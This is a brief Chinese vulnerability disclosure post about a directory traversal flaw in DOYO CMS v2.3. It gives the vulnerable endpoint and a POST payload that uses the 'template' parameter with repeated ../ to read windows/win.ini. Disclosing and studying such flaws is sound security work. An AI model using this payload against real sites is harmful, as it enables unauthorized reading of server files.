原创推荐

DOYO通用建站系统存在通用目录遍历漏洞

0人评论 46人阅读 2022-05-22 16:27:25

漏洞描述

DOYO通用建站系统存在通用目录遍历漏洞,问题出现在POST请求包里”template”参数存在漏洞 aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini

DOYO通用建站系统_v2.3

访问http://localhost/DOYO/index.php?a=record&c=ajax
修改POST请求包为:

aid=19&record_page=1&template=../../../../../../../../../../windows/win.ini

可以访问系统下的win.ini文件。